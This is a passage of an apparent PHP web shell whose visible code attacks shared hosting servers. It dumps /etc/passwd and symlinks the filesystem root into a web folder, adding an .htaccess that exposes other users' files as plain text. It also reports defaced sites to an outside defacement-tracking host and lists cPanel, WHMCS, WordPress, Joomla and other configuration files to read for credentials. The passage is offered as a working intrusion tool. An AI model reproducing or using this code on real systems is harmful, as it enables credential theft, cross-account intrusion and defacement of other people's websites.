  2304. {
  2305. echo "<center>
  2306. <form method=\"POST\">
  2307. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  2308. $file = '/etc/passwd';
  2309. $read = @fopen($file, 'r');
  2310. if ($read){
  2311. $body = @fread($read, @filesize($file));
  2312. echo "".htmlentities($body)."";
  2313. }
  2314. elseif(!$read)
  2315. {
  2316. $read = @show_source($file) ;
  2317. }
  2318. elseif(!$read)
  2319. {
  2320. $read = @highlight_file($file);
  2321. }
  2322. elseif(!$read)
  2323. {
  2324. for($uid=0;$uid<1000;$uid++)
  2325. {
  2326. $ara = posix_getpwuid($uid);
  2327. if (!empty($ara))
  2328. {
  2329. while (list ($key, $val) = each($ara))
  2330. {
  2331. print "$val:";
  2332. }
  2333. print "\n";
  2334. }}}
  2335.  
  2336. flush();
  2337.  
  2338. echo "</textarea>
  2339. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  2340. </form></center>";
  2341. }
  2342. }
  2343. }
  2344. elseif($_GET['do'] == 'symlink') {
  2345. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2346. $d0mains = @file("/etc/named.conf");
  2347. ##httaces
  2348. if($d0mains){
  2349. @mkdir("cox_sym",0777);
  2350. @chdir("cox_sym");
  2351. @exe("ln -s / root");
  2352. $file3 = 'Options Indexes FollowSymLinks
  2353. DirectoryIndex jancox.htm
  2354. AddType text/plain .php
  2355. AddHandler text/plain .php
  2356. Satisfy Any';
  2357. $fp3 = fopen('.htaccess','w');
  2358. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2359. echo "
  2360. <table align=center border=1 style='width:60%;border-color:#333333;'>
  2361. <tr>
  2362. <td align=center><font size=2>S. No.</font></td>
  2363. <td align=center><font size=2>Domains</font></td>
  2364. <td align=center><font size=2>Users</font></td>
  2365. <td align=center><font size=2>Symlink</font></td>
  2366. </tr>";
  2367. $dcount = 1;
  2368. foreach($d0mains as $d0main){
  2369. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  2370. flush();
  2371. if(strlen(trim($domains[1][0])) > 2){
  2372. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  2373. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  2374. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  2375. <td>".$user['name']."</td>
  2376. <td><a href='$full/cox_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  2377. flush();
  2378. $dcount++;}}}
  2379. echo "</table>";
  2380. }else{
  2381. $TEST=@file('/etc/passwd');
  2382. if ($TEST){
  2383. @mkdir("cox_sym",0777);
  2384. @chdir("cox_sym");
  2385. exe("ln -s / root");
  2386. $file3 = 'Options Indexes FollowSymLinks
  2387. DirectoryIndex jancox.htm
  2388. AddType text/plain .php
  2389. AddHandler text/plain .php
  2390. Satisfy Any';
  2391.  $fp3 = fopen('.htaccess','w');
  2392.  $fw3 = fwrite($fp3,$file3);
  2393.  @fclose($fp3);
  2394.  echo "
  2395. <table align=center border=1><tr>
  2396. <td align=center><font size=3>S. No.</font></td>
  2397. <td align=center><font size=3>Users</font></td>
  2398. <td align=center><font size=3>Symlink</font></td></tr>";
  2399.  $dcount = 1;
  2400.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  2401.  while(!feof($file)){
  2402.  $s = fgets($file);
  2403.  $matches = array();
  2404.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  2405.  $matches = str_replace("home/","",$matches[1]);
  2406.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2407.  continue;
  2408.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2409. <td align=center><font class=txt>" . $matches . "</td>";
  2410.  echo "<td align=center><font class=txt><a href=$full/cox_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2411.  $dcount++;}fclose($file);
  2412.  echo "</table>";}else{if($os != "Windows"){@mkdir("cox_sym",0777);@chdir("cox_sym");@exe("ln -s / root");$file3 = '
  2413. Options Indexes FollowSymLinks
  2414. DirectoryIndex jancox.htm
  2415. AddType text/plain .php
  2416. AddHandler text/plain .php
  2417. Satisfy Any
  2418. ';
  2419.  $fp3 = fopen('.htaccess','w');
  2420.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2421.  echo "
  2422. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  2423. <table align=center border=1><tr>
  2424. <td align=center><font size=3>ID</font></td>
  2425. <td align=center><font size=3>Users</font></td>
  2426. <td align=center><font size=3>Symlink</font></td></tr>";
  2427.  $temp = "";$val1 = 0;$val2 = 1000;
  2428.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  2429.  if ($uid)$temp .= join(':',$uid)."\n";}
  2430.  echo '<br/>';$temp = trim($temp);$file5 =
  2431.  fopen("test.txt","w");
  2432.  fputs($file5,$temp);
  2433.  fclose($file5);$dcount = 1;$file =
  2434.  fopen("test.txt", "r") or exit("Unable to open file!");
  2435.  while(!feof($file)){$s = fgets($file);$matches = array();
  2436.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  2437.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2438.  continue;
  2439.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2440. <td align=center><font class=txt>" . $matches . "</td>";
  2441.  echo "<td align=center><font class=txt><a href=$full/cox_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2442.  $dcount++;}
  2443.  fclose($file);
  2444.  echo "</table></div></center>";unlink("test.txt");
  2445.  } else
  2446.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  2447.  }
  2448.  }    
  2449. }
  2450. elseif($_GET['do'] == 'defacerid') {
  2451. echo "<center><form method='post'>
  2452.         <u>Defacer</u>: <br>
  2453.         <input type='text' name='hekel' size='50' value='0x1999'><br>
  2454.         <u>Team</u>: <br>
  2455.         <input type='text' name='tim' size='50' value='Indonesian Code Party'><br>
  2456.         <u>Domains</u>: <br>
  2457.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  2458.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
  2459.         </form>";
  2460. $site = explode("\r\n", $_POST['sites']);
  2461. $go = $_POST['go'];
  2462. $hekel = $_POST['hekel'];
  2463. $tim = $_POST['tim'];
  2464. if($go) {
  2465. foreach($site as $sites) {
  2466. $zh = $sites;
  2467. $form_url = "https://www.defacer.id/notify";
  2468. $data_to_post = array();
  2469. $data_to_post['attacker'] = "$hekel";
  2470. $data_to_post['team'] = "$tim";
  2471. $data_to_post['poc'] = 'SQL Injection';
  2472. $data_to_post['url'] = "$zh";
  2473. $curl = curl_init();
  2474. curl_setopt($curl,CURLOPT_URL, $form_url);
  2475. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  2476. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  2477. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  2478. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2479. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  2480. $result = curl_exec($curl);
  2481. echo $result;
  2482. curl_close($curl);
  2483. echo "<br>";
  2484. }
  2485. }
  2486. }
  2487.  
  2488. elseif($_GET['do'] == 'config') {
  2489.     if($_POST){
  2490.         $passwd = $_POST['passwd'];
  2491.         mkdir("cox_config", 0777);
  2492.         $isi_htc = "Options all\nRequire None\nSatisfy Any";
  2493.         $htc = fopen("cox_config/.htaccess","w");
  2494.         fwrite($htc, $isi_htc);
  2495.         preg_match_all('/(.*?):x:/', $passwd, $user_config);
  2496.         foreach($user_config[1] as $user_cox) {
  2497.             $user_config_dir = "/home/$user_cox/public_html/";
  2498.             if(is_readable($user_config_dir)) {
  2499.                 $grab_config = array(
  2500.                                         "/home/$user_cox/.my.cnf" => "cpanel",
  2501.                     "/home/$user_cox/.accesshash" => "WHM-accesshash",
  2502.                     "/home/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  2503.                     "/home/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  2504.                     "/home/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2505.                     "/home/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",             
  2506.                     "/home/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  2507.                     "/home/$user_cox/public_html/forum/config.php" => "phpBB",
  2508.                     "/home/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  2509.                     "/home/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  2510.                     "/home/$user_cox/public_html/app/etc/local.xml" => "Magento",
  2511.                     "/home/$user_cox/public_html/admin/config.php" => "OpenCart",
  2512.                     "/home/$user_cox/public_html/slconfig.php" => "Sitelok",
  2513.                     "/home/$user_cox/public_html/application/config/database.php" => "Ellislab",                   
  2514.                     "/home/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  2515.                     "/home/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2516.                     "/home/$user_cox/public_html/central/configuration.php" => "WHM Central",
  2517.                     "/home/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2518.                     "/home/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2519.                     "/home/$user_cox/public_html/submitticket.php" => "WHMCS",                                     
  2520.                     "/home/$user_cox/public_html/configuration.php" => "Joomla",                   
  2521.                     "/home/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2522.                     "/home/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2523.                     "/home/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",      
  2524.                     "/home/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  2525.                     "/home/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  2526.                     "/home/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  2527.                     "/home/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  2528.                     "/home/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  2529.                     "/home/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  2530.                     "/home/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  2531.                     "/home/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  2532.                     "/home/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  2533.                     "/home/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  2534.                     "/home/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  2535.                     "/home/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  2536.                     "/home/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  2537.                     "/home/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  2538.                     "/home/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  2539.                     "/home/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  2540.                     "/home/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2541.                     "/home/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  2542.                     "/home/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2543.                     "/home/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2544.                     "/home/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2545.                     "/home/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  2546.                     "/home/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  2547.                     "/home/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  2548.                     "/home/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  2549.                     "/home/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  2550.                     "/home/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  2551.                     "/home/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  2552.                     "/home/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  2553.                     "/home/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  2554.                     "/home/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  2555.                     "/home/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2556.                     "/home/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                  
  2557.                     "/home/$user_cox/public_html/wp-config.php" => "WordPress",
  2558.                     "/home/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2559.                     "/home/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2560.                     "/home/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",     
  2561.                     "/home/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  2562.                     "/home/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  2563.                     "/home/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  2564.                     "/home/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  2565.                     "/home/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  2566.                     "/home/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  2567.                     "/home/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  2568.                     "/home/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  2569.                     "/home/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  2570.                     "/home/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  2571.                     "/home/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  2572.                     "/home/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  2573.                     "/home/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  2574.                     "/home/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  2575.                     "/home/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  2576.                     "/home/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  2577.                     "/home/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2578.                     "/home/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  2579.                     "/home/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2580.                     "/home/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2581.                     "/home/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2582.                     "/home/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  2583.                     "/home/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  2584.                     "/home/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  2585.                     "/home/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  2586.                     "/home/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  2587.                     "/home/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  2588.                     "/home/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  2589.                     "/home/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  2590.                     "/home/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  2591.                     "/home/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  2592.                     "/home/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2593.                     "/home/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
  2594.                                         "/home1/$user_cox/.my.cnf" => "cpanel",
  2595.                     "/home1/$user_cox/.accesshash" => "WHM-accesshash",
  2596.                     "/home1/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  2597.                     "/home1/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  2598.                     "/home1/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2599.                     "/home1/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",            
  2600.                     "/home1/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  2601.                     "/home1/$user_cox/public_html/forum/config.php" => "phpBB",
  2602.                     "/home1/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  2603.                     "/home1/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  2604.                     "/home1/$user_cox/public_html/app/etc/local.xml" => "Magento",
  2605.                     "/home1/$user_cox/public_html/admin/config.php" => "OpenCart",
  2606.                     "/home1/$user_cox/public_html/slconfig.php" => "Sitelok",
  2607.                     "/home1/$user_cox/public_html/application/config/database.php" => "Ellislab",                  
  2608.                     "/home1/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  2609.                     "/home1/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2610.                     "/home1/$user_cox/public_html/central/configuration.php" => "WHM Central",
  2611.                     "/home1/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2612.                     "/home1/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2613.                     "/home1/$user_cox/public_html/submitticket.php" => "WHMCS",                                    
  2614.                     "/home1/$user_cox/public_html/configuration.php" => "Joomla",                  
  2615.                     "/home1/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2616.                     "/home1/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2617.                     "/home1/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
  2618.                     "/home1/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  2619.                     "/home1/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  2620.                     "/home1/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  2621.                     "/home1/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  2622.                     "/home1/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  2623.                     "/home1/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  2624.                     "/home1/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  2625.                     "/home1/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  2626.                     "/home1/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  2627.                     "/home1/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  2628.                     "/home1/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  2629.                     "/home1/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  2630.                     "/home1/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  2631.                     "/home1/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  2632.                     "/home1/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  2633.                     "/home1/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  2634.                     "/home1/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2635.                     "/home1/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  2636.                     "/home1/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2637.                     "/home1/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2638.                     "/home1/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2639.                     "/home1/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  2640.                     "/home1/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  2641.                     "/home1/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  2642.                     "/home1/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  2643.                     "/home1/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  2644.                     "/home1/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  2645.                     "/home1/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  2646.                     "/home1/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  2647.                     "/home1/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  2648.                     "/home1/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  2649.                     "/home1/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2650.                     "/home1/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                 
  2651.                     "/home1/$user_cox/public_html/wp-config.php" => "WordPress",
  2652.                     "/home1/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2653.                     "/home1/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2654.                     "/home1/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
  2655.                     "/home1/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  2656.                     "/home1/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  2657.                     "/home1/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  2658.                     "/home1/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  2659.                     "/home1/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  2660.                     "/home1/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  2661.                     "/home1/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  2662.                     "/home1/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  2663.                     "/home1/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  2664.                     "/home1/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  2665.                     "/home1/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  2666.                     "/home1/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  2667.                     "/home1/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  2668.                     "/home1/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  2669.                     "/home1/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  2670.                     "/home1/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  2671.                     "/home1/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2672.                     "/home1/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  2673.                     "/home1/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2674.                     "/home1/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2675.                     "/home1/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2676.                     "/home1/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  2677.                     "/home1/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  2678.                     "/home1/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  2679.                     "/home1/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  2680.                     "/home1/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  2681.                     "/home1/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  2682.                     "/home1/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  2683.                     "/home1/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  2684.                     "/home1/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  2685.                     "/home1/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  2686.                     "/home1/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2687.                     "/home1/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
  2688.                                         "/home2/$user_cox/.my.cnf" => "cpanel",
  2689.                     "/home2/$user_cox/.accesshash" => "WHM-accesshash",
  2690.                     "/home2/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  2691.                     "/home2/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  2692.                     "/home2/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2693.                     "/home2/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",            
  2694.                     "/home2/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  2695.                     "/home2/$user_cox/public_html/forum/config.php" => "phpBB",
  2696.                     "/home2/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  2697.                     "/home2/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  2698.                     "/home2/$user_cox/public_html/app/etc/local.xml" => "Magento",
  2699.                     "/home2/$user_cox/public_html/admin/config.php" => "OpenCart",
  2700.                     "/home2/$user_cox/public_html/slconfig.php" => "Sitelok",
  2701.                     "/home2/$user_cox/public_html/application/config/database.php" => "Ellislab",                  
  2702.                     "/home2/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  2703.                     "/home2/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2704.                     "/home2/$user_cox/public_html/central/configuration.php" => "WHM Central",
  2705.                     "/home2/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2706.                     "/home2/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2707.                     "/home2/$user_cox/public_html/submitticket.php" => "WHMCS",                                    
  2708.                     "/home2/$user_cox/public_html/configuration.php" => "Joomla",                  
  2709.                     "/home2/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2710.                     "/home2/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2711.                     "/home2/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
  2712.                     "/home2/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  2713.                     "/home2/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  2714.                     "/home2/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  2715.                     "/home2/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  2716.                     "/home2/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  2717.                     "/home2/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  2718.                     "/home2/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  2719.                     "/home2/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  2720.                     "/home2/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  2721.                     "/home2/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  2722.                     "/home2/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  2723.                     "/home2/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  2724.                     "/home2/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  2725.                     "/home2/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  2726.                     "/home2/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  2727.                     "/home2/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  2728.                     "/home2/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2729.                     "/home2/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  2730.                     "/home2/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2731.                     "/home2/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2732.                     "/home2/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2733.                     "/home2/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  2734.                     "/home2/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  2735.                     "/home2/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  2736.                     "/home2/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  2737.                     "/home2/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  2738.                     "/home2/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  2739.                     "/home2/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  2740.                     "/home2/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  2741.                     "/home2/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  2742.                     "/home2/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  2743.                     "/home2/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2744.                     "/home2/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                 
  2745.                     "/home2/$user_cox/public_html/wp-config.php" => "WordPress",
  2746.                     "/home2/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2747.                     "/home2/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2748.                     "/home2/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
  2749.                     "/home2/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  2750.                     "/home2/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  2751.                     "/home2/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  2752.                     "/home2/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  2753.                     "/home2/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  2754.                     "/home2/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  2755.                     "/home2/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
